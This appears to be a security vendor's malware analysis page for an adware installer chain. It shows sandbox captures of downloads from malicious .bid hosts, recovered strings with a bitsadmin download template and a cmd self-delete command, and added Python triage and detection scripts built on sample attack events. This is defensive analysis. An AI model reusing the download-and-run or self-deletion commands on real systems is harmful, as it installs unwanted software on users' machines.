X-Amz-Cf-Id: hwFaWw-7Nj8eeAHF2MXvCTn7uuTK6GtEQuMIKFI2ctTLJUFa2FHwEQ==

.PNG........IHDR...>...E......$UF....tEXtSoftware.Adobe ImageReadyq
.e<....IDATx..[.O[u.........(.E....o..............U0...Q`.%...}0..$
..d....%&=<.H.|q.sNZ..R..=7.._/P...Z.....rN.....;..0`.......0`.....
S<q..x.6...8. .....4=A].....Y...L<y~&\".I.G..X.Y,......L\{......
./..s.Id.1L....si6o@.c.4.h...5:8.....!...............j..W.h..UvZ...bC.
B....1..j\YZ..9...9....r0..8......V...\..[.HO.y..`.{w..SQ.[.m..L.V.nli
.....L..`..n&...\.bZ.U.@.q...u.......wJ.~.f......:.......x.i.g.......s
...>4...J...z .^r.z..3....RO<y.wI.).Z..v......^p.u.y"H....W*6Q..
tX."?..w...'...%. .......f.|o....3.s......:.Zz].2.............|.v..U..
..c..z.b....i........>....q.S .....'k3...6.......>D.qY.E........
....................1e1=.Ff)..o..|_..O...z...P6. ... ....?O.S...=.DtU.
.c.-C....SG.%.Y....*.......#.=y.K.quyM.......g.(....\9y.Y..s\v....!...
....>@..d............I..d{.m...!..zFR..........._#rr9.g....ut~....!
..;....-....*w...Hx.E.C]........}.....c.n"..>.".._.ZQ.C.."....q.j".
..... ......._I....S.g.....f...o3..Q...jpf......s.)...1B].SO..3..$N..]
.g(.z......D.......T...C/......u.a}....`. ":m.-m..W.....4..JJ.}...%.U.
T....-.N.....m."..?YE...q=....|P.....X.H,.......|..J.F.#M.......w.t...
Xrr&..e=;.a......R.e.RN...2....n-....g..8d../;....b......p..).&.0Xm.._
.Gs.T..V.y.mo..3....h...F.-.^HH......k....2i...v..&.......j..s,...~ok.
.....=......n.`.x..1.-.I...G..V...F...,U.K...Hb".;p...A/...s.V/.._....
7q.S.|....&.~81v-..../...!.G.Q.m............\./*.$h...>..*.u.@b.ZM~
h1yH..W.E...Wp].a.'{....8r.A,...r.....).hY...?.KE.u.........._...d<<< skipped >>>
GET /get.php?ses=429155916441231936 HTTP/1.0
Host: away.yosauruslega.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 636416
Connection: close
Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0
Pragma: no-cache
Expires: Sun, 01 Jan 2014 00:00:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Access-Control-Allow-Origin: *
Content-Transfer-Encoding: Binary
Content-disposition: attachment; filename="cpSetup.exe"
Date: Sun, 13 Nov 2016 05:18:17 GMT
X-Cache: Miss from cloudfront
Via: 1.1 420810dc8ca5cb74b64cae9e4b264cc9.cloudfront.net (CloudFront)
X-Amz-Cf-Id: WzMfcmhZ-U-zig-ivUSgMwISw4lkFuvogIDTJNXx0sRnwuKboE_IfQ==

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........4.Q.U...U..
.U..r....U..r....U..r....U.......U.......U.......U.... ..U...U...U..S.
...U..T....U...U|..U..S....U..Rich.U..........................PE..L...
h.'X.................\...t...............p....@.......................
... ............@.....................................P........5......
................| ......p...........................@...@............p
..p............................text....Z.......\.................. ..`
.rdata.......p.......`..............@..@.data....Y...0...<.........
.........@....gfids...............P..............@..@.tls.............
....R..............@....rsrc....5.......6...T..............@..@.reloc.
.| .......,..................@..B.....................................
......................................................................
......................................................................
................................................4.I..6;..h.iD...H.I...
....D.I.......4.I.......Y.................L.I...:..j.h .D...`.I.......
\.I.......L.I....:..h.iD..k...Y....j..g...h.iD...8.D..d.I..J........d.
I..h.I....jI..a...h.jD..'...Y.....................X........F..F......O
..O..o....^R].c.h..E...!..:..|..L..9.....P.u..E....8.........?b.0.....
E..D.(.}!W.0...YY....D...|...v........D.....v............u..E.........
.....'......|..D..8.....P...U......E..M..E..E..E.P.|..L.P.D.....]...U.
.Q_.u....u..dv.........B..q7;<..L.s&......?...k.0.....E..D.!.t.<<< skipped >>>
GET hXXp://ee.ilentialnessme.bid/offer.php?affId=2291&trackingId=135176390&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1
Host: ee.ilentialnessme.bid
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 13 Nov 2016 05:18:21 GMT
Connection: close
Content-Length: 1768

.S.T '.QE9..bb,........a...Y $.4$.r!.Ss......Xd<..._&.....T.....,
..LMPLpR,..>..K.. .q..r.yI}P.@i..dz..K18....&8.......@.F.wO. ..<
............-)....d......u.....[.....-..RD.u..>.....X].#..2.\...y..
-.=.X......Y..*2..>hD..."._?......).&ceC._ 8Uw.!......`y.X6.....*..
....a`..f...-.v...)X....../f.jD......6..*.:..6...F..G...D%(......qm.}.
`..w.JR...j.._VB.xw..s.z.W..w....*..?1./.jRp..$.g..7.Xv)...........M..
...b....*X.heboL...{.s>.t ........{.x......<..Q.....[...sb.=..JK
x..2X.@O.$.d.Y .j{.%A.[.=..g..|N#....%!...^..q)......}^.....7dN`o..{;.
A..O......g..%...r.].Dy.j.. t . p.x.|R.[#...$...G. .?..H....8..... ..w
c......W..hv:z...[...[...8....V.....v.)..j.......Do".fq"..@..jI.......
...]...t.;.3.8gt\....F.$...A}.ex...:...,4..n%kF;.';3.../.......H.J.,|.
r..I..$%M..C...l..Y\.........Z.......9r..=A....X..........2[9 cJ$....D
3b.|....h. *......eh.........gR........ ..!..a.\y]..w..1.|....[.......
...8.Y.XT/.i.&.2i...??>.....EZS."........*#x..C...,T.......#%.js,.1
..tT#../...htZ9%.......V.v.ri..n.\A.......g. .\}..........lI..j.......
six}.^ .J]9.......t..Y.s..n.B..am%.Vkv...H4./&.4.E..C.w.?i..^&........
g2d:..'.&Gc...m.i...O..<...}4VeJ..2..Y......B..... .|.Y.r.?R.c.. ..
B....p,....rz..Q....O.h....c........?.yj.I..9..D.#....q.c.....8.....f.
.f.e.....M...gc.,..i:*....I=&6.o....*..l....hN.......8,(...9.4...O.u..
/.{..N.~..k.H.OX^......hYm..]c..#....V..1..d.m.Q....I.LX....].T.J.~7."
....6aA............itU.4B.G....Sz.~.c.A...59.....e...g{...%...T .N.@..
.>.6z.lR....%.......p..7s..Z.D>....D"Q.Z..S./a..c.`#-.......<<< skipped >>>
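The captures above show the delivery chain end to end: the NSIS downloader (User-Agent NSISDL/1.2) requests get.php on away.yosauruslega.bid and receives a PE image served as application/octet-stream under the name cpSetup.exe, and the InstallCapital beacon to ee.ilentialnessme.bid reports the victim's country, CPU architecture, Windows version, default browser, UAC state and a client id in its query string. The script below is an added example and is not part of the Lavasoft report. It parses a plain-text transcript in the layout used on this page and surfaces those signals; the SAMPLE transcript is constructed from the captures above (offer.php query shortened, defanged hXXp/VVV kept as in the report and re-fanged only for parsing), and the downloader user-agent list is an assumed short list, not something the report states.

```python
"""Triage of a sandbox HTTP transcript (added example, not from the report).

Parses request/response pairs out of a plain-text capture laid out as above
(request line, request headers, status line, response headers, blank line,
body excerpt) and flags installer user agents, PE payloads and beacons that
leak the victim host's configuration in the query string.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample modelled on the captures shown on this page.
SAMPLE = """GET /get.php?ses=429155916441231936 HTTP/1.0
Host: away.yosauruslega.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 636416
Content-disposition: attachment; filename="cpSetup.exe"

MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00
GET hXXp://ee.ilentialnessme.bid/offer.php?affId=2291&cc=UA&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1
Host: ee.ilentialnessme.bid
User-Agent: InstallCapital
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 1768

\xd3S\xa9T
"""

REQ_LINE = re.compile(r"^(GET|POST|HEAD) (\S+) HTTP/1\.[01]$", re.MULTILINE)
# Assumed short list of installer/downloader user agents worth a second look.
DOWNLOADER_UA = ("NSISDL", "InstallCapital", "Microsoft BITS")
# Query keys that describe the victim, not the offer: country, architecture,
# Windows version, default browser, UAC state, client id.
FINGERPRINT_KEYS = ("cc", "sb", "wv", "db", "uac", "cid")


def refang(url):
    """Undo the report's defanging (hXXp -> http, VVV -> www)."""
    return url.replace("hXXp://", "http://").replace("VVV.", "www.")


def parse_transcript(text):
    """Yield one dict per request/response pair found in the transcript."""
    starts = [m.start() for m in REQ_LINE.finditer(text)]
    for i, start in enumerate(starts):
        end = starts[i + 1] if i + 1 < len(starts) else len(text)
        head, _, body = text[start:end].partition("\n\n")
        lines = head.splitlines()
        method, target, _ = lines[0].split(" ", 2)
        req_hdrs, resp_hdrs, current = {}, {}, None
        current = req_hdrs
        for line in lines[1:]:
            if line.startswith("HTTP/1."):      # status line: switch to response side
                current = resp_hdrs
                continue
            name, _, value = line.partition(":")
            current[name.strip().lower()] = value.strip()
        target = refang(target)
        yield {"method": method, "target": target,
               "host": req_hdrs.get("host") or urlsplit(target).netloc,
               "request": req_hdrs, "response": resp_hdrs, "body": body}


def triage(pair):
    """Return human-readable findings for one request/response pair."""
    findings = []
    ua = pair["request"].get("user-agent", "")
    if any(tag in ua for tag in DOWNLOADER_UA):
        findings.append(f"downloader user agent: {ua}")
    # Declared type and file name are attacker-controlled: check the magic bytes.
    if pair["body"].startswith("MZ"):
        disp = pair["response"].get("content-disposition", "")
        name = re.search(r'filename="?([^";]+)', disp)
        declared = pair["response"].get("content-type", "no content-type")
        findings.append("PE payload delivered"
                        + (f" as {name.group(1)}" if name else "")
                        + f" (declared {declared})")
    query = parse_qs(urlsplit(pair["target"]).query)
    leaked = [k for k in FINGERPRINT_KEYS if k in query]
    if leaked:
        findings.append("beacon reports host fingerprint: "
                        + ", ".join(f"{k}={query[k][0]}" for k in leaked))
    return findings


def report(text):
    """Map each contacted host to its findings, omitting hosts with none."""
    out = {}
    for pair in parse_transcript(text):
        findings = triage(pair)
        if findings:
            out.setdefault(pair["host"], []).extend(findings)
    return out


if __name__ == "__main__":
    for host, items in report(SAMPLE).items():
        print(host)
        for item in items:
            print("  -", item)
```

The magic-byte check is the part worth keeping: the server declared application/octet-stream here, but a Content-Type of text/html or image/png with an MZ body would be caught the same way, and the fingerprint keys in the beacon are exactly what an affiliate network needs to decide which follow-on offer to serve.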
The Application connects to the servers at the following location(s):
.text
`.data
.rsrc
@.reloc
>.uzf
.us;}
IEFRAME.dll
MLANG.dll
iertutil.dll
urlmon.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
msvcrt.dll
USER32.dll
KERNEL32.dll
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
GetWindowsDirectoryW
_amsg_exit
_wcmdln
UrlApplySchemeW
PathIsURLW
UrlCanonicalizeW
UrlCreateFromPathW
iexplore.pdb
KEYW
KEYWh
KEYWD
.ENNNG.
a.ry.v
l.igM4
?1%SGf
xh.JW^
.97777"7" " " !
3.... ))
8888888888888
8888888888
.lPV)
úW1
.ApX/
H.ZAf
ð[U
%s!FK
1YYYY1YY9GEAA=77YRNNNW:.VT1
888777777
Y.hilkRROMLK=C,
..(((($$
3...((((%
3....(.''$
3.2...((((%
33.2....(,'
55323222...
(%&'00443445?
00.,,,4(
000.,,9(
0020..9(
003200;(
(#'( (''''!'!Microsoft.InternetExplorer.Default
user32.dll
Kernel32.DLL
xfire.exe
wlmail.exe
winamp.exe
waol.exe
sidebar.exe
psocdesigner.exe
np.exe
netscape.exe
netcaptor.exe
neoplanet.exe
msn.exe
mshtmpad.exe
mshta.exe
loader42.exe
infopath.exe
iexplore.exe
iepreview.exe
groove.exe
explorer.exe
dreamweaver.exe
contribute.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}"%s" %s
Kernel32.dll
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
{00000000-0000-0000-0000-000000000000}\\?\Volume
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Imaging_CreateWebPagePreview
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
Windows
9.00.8112.16421
iexplore.exe_568:
.text
`.data
.rsrc
@.reloc
>.uzf
.us;}
IEFRAME.dll
MLANG.dll
iertutil.dll
urlmon.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
msvcrt.dll
USER32.dll
KERNEL32.dll
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
GetWindowsDirectoryW
_amsg_exit
_wcmdln
UrlApplySchemeW
PathIsURLW
UrlCanonicalizeW
UrlCreateFromPathW
iexplore.pdb
KEYW
KEYWh
KEYWD
.ENNNG.
a.ry.v
l.igM4
?1%SGf
xh.JW^
.97777"7" " " !
3.... ))
8888888888888
8888888888
.lPV)
úW1
.ApX/
H.ZAf
ð[U
%s!FK
1YYYY1YY9GEAA=77YRNNNW:.VT1
888777777
Y.hilkRROMLK=C,
..(((($$
3...((((%
3....(.''$
3.2...((((%
33.2....(,'
55323222...
(%&'00443445?
00.,,,4(
000.,,9(
0020..9(
003200;(
(#'( (''''!'!Microsoft.InternetExplorer.Default
user32.dll
Kernel32.DLL
xfire.exe
wlmail.exe
winamp.exe
waol.exe
sidebar.exe
psocdesigner.exe
np.exe
netscape.exe
netcaptor.exe
neoplanet.exe
msn.exe
mshtmpad.exe
mshta.exe
loader42.exe
infopath.exe
iexplore.exe
iepreview.exe
groove.exe
explorer.exe
dreamweaver.exe
contribute.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}"%s" %s
Kernel32.dll
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
{00000000-0000-0000-0000-000000000000}\\?\Volume
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Imaging_CreateWebPagePreview
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
Windows
9.00.8112.16421
SearchProtocolHost.exe_2268:
.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
MSSHooks.dll
IMM32.dll
SHLWAPI.dll
SrchCollatorCatalogInfo
SrchDSSLogin
SrchDSSPortManager
SrchPHHttp
SrchIndexerQuery
SrchIndexerProperties
SrchIndexerPlugin
SrchIndexerClient
SrchIndexerSchema
Msidle.dll
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
</MSG></TRC>
<MSG>
<ERR> 0xx=
<LOC> %s(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%s"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%s"
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
SHELL32.dll
PROPSYS.dll
ntdll.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
MsgWaitForMultipleObjects
SearchProtocolHost.pdb
2 2(20282|2
4%5S5
Software\Microsoft\Windows Search
https
kernel32.dll
msTracer.dll
msfte.dll
lX-X-X-XX-XXXXXX
SOFTWARE\Microsoft\Windows Search
tquery.dll
%s\%s
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
advapi32.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
winhttp.dll
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<LOC> %S(%d) </LOC>
tagname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
Microsoft Windows Search Protocol Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchProtocolHost.exe
Windows
7.00.7601.17610
SearchFilterHost.exe_2952:
.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
IMM32.dll
MSSHooks.dll
mscoree.dll
SHLWAPI.dll
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
SearchFilterHost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Search.MSSFH"
<requestedExecutionLevel
3 3(30383|3
kernel32.dll
Software\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
tquery.dll
advapi32.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<ERR> 0xx=
<LOC> %S(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%S"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%S"
</MSG></TRC>
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
winhttp.dll
Microsoft Windows Search Filter Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchFilterHost.exe
Windows
7.00.7601.17610
Setup__2140_il2.exe_3512:
.text
`.rdata
@.data
.rsrc
@.reloc
j5SSh
8%uEP3
xSSSh
FTPjKS
FtPj;S
C.PjRV
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
portuguese-brazilian
operator
GetProcessWindowStation
WinHttpSetStatusCallback
fWIzyZ3CtqkwSGU6ncTUrL4WX1Iry5L3vqQTHEYD6bbBi5cnf1AG67zUnIwnb0UL86vGgIM5aFAV5qjUlos5fl0Ph5r6qKkUU3Auh5vnragKHGQ6w5/huucMU2Ury97mtr0dTz9A
Failed to get the Temp folder: %d
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
CInstallationManager::IsPartOfInstallation value=%s
CInstallationManager::SetComponentInstallationEnded %S
%Y-%m-%d %H:%M:%S
CProgressUpdateRequest::CreateInstance %S
CProgressUpdateRequest::ProgressUpdate %S
Send progress update request %s
Progress Request for '%S' return %s
%c%c%c%c
C:\Amon\AmonSystemBs\BootStrapper\ProductionNoSign\Launcher.pdb
VERSION.dll
KERNEL32.dll
USER32.dll
GDI32.dll
RegDeleteKeyW
RegCloseKey
RegQueryInfoKeyW
RegEnumKeyExW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
Secur32.dll
WinHttpCloseHandle
WinHttpOpen
WinHttpSetOption
WinHttpGetProxyForUrl
WinHttpCrackUrl
WinHttpConnect
WinHttpOpenRequest
WinHttpSetStatusCallback
WinHttpSendRequest
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpReceiveResponse
WINHTTP.dll
GetProcessHeap
GetCPInfo
zcÁ
.?AVAsyncWinHttp@@
.?AV?$_IDispEventLocator@$0MJ@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$IDispEventSimpleImpl@$0MJ@VCBoot@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AUISupportErrorInfo@@
.?AV?$CAtlExeModuleT@VCBootStrapperModule@@@ATL@@
?456789:;<=
!"#$%&'()* ,-./0123
noesis.beryline.1 = s 'Inst Class'
CLSID = s '{ca90508a-de03-464c-b43f-2ab03068b458}'noesis.beryline = s 'Inst Class'
CurVer = s 'noesis.beryline.1'
ForceRemove {ca90508a-de03-464c-b43f-2ab03068b458} = s 'Inst Class'ProgID = s 'noesis.beryline.1'
VersionIndependentProgID = s 'noesis.beryline'
val ServerExecutable = s '%MODULE_RAW%'
TypeLib = s '{b12fc5b9-4613-4ff8-8f59-17f01c4b0f69}'.sssh
REÚ
\.crr
s1f-'
.DC l
tweb
<assemblyIdentity type="win32" processorArchitecture="*" version="1.2.1.2" name="win"/>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/><ms_asmv2:requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />
stdole2.tlbWWW(
msgWd
keyNameW
urlW
url2d
YtcmdLineW
P%CreateIconWW
iconUrlW
regKeyWW
CheckRegKeyW
keyWd
W.launchCommandLineWWW
~cmdW
WDIsShortNameInstalledd
Created by MIDL version 7.00.0555 at Sun Oct 16 03:45:47 2016
: :):0:`:
3!3@3^3{33"3&3*3.395
1%2S2v2
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
wKERNEL32.DLL
ADVAPI32.DLL
WUSER32.DLL
Winhttp.dll
shlwapi.dll
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
appimageurl
cmdl
capp=%s&cid=%s&mhx=%S&base=%s
\bitsadmin.exe
\Support Tools\bitsadmin.exe
:?*\"'/.
dream.capture
%sami%s%d%d.exe
%d-%.2d-%.2dT%.2d:%.2d:00
%d-%.2d-%.2dT%.2d:-:00
/retrynav %d
Advapi32.dll
shell32.dll
{23A96663-59D1-4C44-A0DB-1118D9C4ABBA}OLEAUT32.DLL
kernel32.dll
sn=%s&hx=%S&base=%s
rfsw%d
advapi32.dll
v2.0.50727
v1.1.4322
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
%ProgramFiles%\Microsoft Silverlight\sllauncher.exe
ami%sExd
bitsadmin /transfer amijob /download /priority high %s %s
ami%sExi
/c del "%s"
cmd.exe
%TEMP%\task.vbs
ami%sExdel
%%X
version.dll
OleAut32.dll
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe
{8856F961-340A-11D0-A96B-00C04FD705A2}1.1.5.26
setup.exe
selfdislikedfarfet.site
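The strings recovered from Setup__2140_il2.exe above include a ready-made `bitsadmin /transfer amijob /download /priority high %s %s` template, a `%TEMP%\task.vbs` path, and `cmd.exe` with a `/c del "%s"` template, alongside a manifest that requests `requireAdministrator`: the bootstrapper fetches follow-on installers through BITS, runs a dropped script, and removes itself. The following is an added example, not part of the Lavasoft report, showing process-creation detections for that chain. The EVENTS are constructed Sysmon-style process creation records, the download URL and user name in them are placeholders, and the rule names are this example's own.

```python
"""Process-creation detections for the behaviour implied by the strings above
(added example, not from the report). EVENTS are constructed Sysmon-style
process creation records; the URL and user name in them are placeholders."""
import re
from pathlib import PureWindowsPath

TEMP = r"C:\Users\victim\AppData\Local\Temp"   # placeholder path (constructed)

EVENTS = [
    {   # the bitsadmin download template from the strings, filled in
        "Image": r"C:\Windows\System32\bitsadmin.exe",
        "CommandLine": "bitsadmin /transfer amijob /download /priority high "
                       "http://example.invalid/next.exe " + TEMP + r"\ami1234.exe",
        "ParentImage": TEMP + r"\Setup__2140_il2.exe",
    },
    {   # %TEMP%\task.vbs handed to the script host
        "Image": r"C:\Windows\System32\wscript.exe",
        "CommandLine": 'wscript.exe "' + TEMP + r'\task.vbs"',
        "ParentImage": TEMP + r"\Setup__2140_il2.exe",
    },
    {   # cmd.exe /c del "%s" used to delete the parent installer
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": 'cmd.exe /c del "' + TEMP + r'\Setup__2140_il2.exe"',
        "ParentImage": TEMP + r"\Setup__2140_il2.exe",
    },
    {   # benign administrative use: must not fire
        "Image": r"C:\Windows\System32\bitsadmin.exe",
        "CommandLine": "bitsadmin /list /allusers",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
]

TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.IGNORECASE)


def args_of(cmd):
    """Split a command line on spaces while keeping quoted paths whole."""
    return [a.strip('"') for a in re.findall(r'"[^"]*"|\S+', cmd)]


def detect(ev):
    """Return the rule names that fire for one process-creation event."""
    hits = []
    image = PureWindowsPath(ev["Image"]).name.lower()
    cmd, parent = ev["CommandLine"], ev["ParentImage"]
    low = cmd.lower()

    # Rule 1: BITS used as a downloader; worse when the parent lives in a temp dir.
    if image == "bitsadmin.exe" and "/transfer" in low and "/download" in low:
        hits.append("bitsadmin_download")
        if TEMP_DIR.search(parent):
            hits.append("bitsadmin_download_from_temp_parent")

    # Rule 2: script host executing a .vbs that was dropped in a temp directory.
    if image in ("wscript.exe", "cscript.exe") and any(
        a.lower().endswith(".vbs") and TEMP_DIR.search(a) for a in args_of(cmd)
    ):
        hits.append("script_host_runs_temp_vbs")

    # Rule 3: cmd.exe /c del <path> where <path> is the parent image (self-deletion).
    if image == "cmd.exe" and re.search(r"/c\s+del\s", low):
        if any(a.lower() == parent.lower() for a in args_of(cmd)[1:]):
            hits.append("cmd_del_parent_self_delete")
    return hits


def scan(events):
    """Return (image name, rule hits) for every event that triggered a rule."""
    results = []
    for ev in events:
        hits = detect(ev)
        if hits:
            results.append((PureWindowsPath(ev["Image"]).name, hits))
    return results


if __name__ == "__main__":
    for image, hits in scan(EVENTS):
        print(image, "->", ", ".join(hits))
```

Rule 3 compares the deleted path with the parent image rather than matching on `del` alone, which is what separates an installer erasing itself from ordinary cleanup batch files; rule 1 keeps the plain `bitsadmin_download` hit separate from the temp-parent refinement so the noisier signal can be tuned independently.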
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
Setup__2140_il2.exe:2308
sevensetup.exe:3356
%original file name%.exe:3580
cpSetup.exe:3976
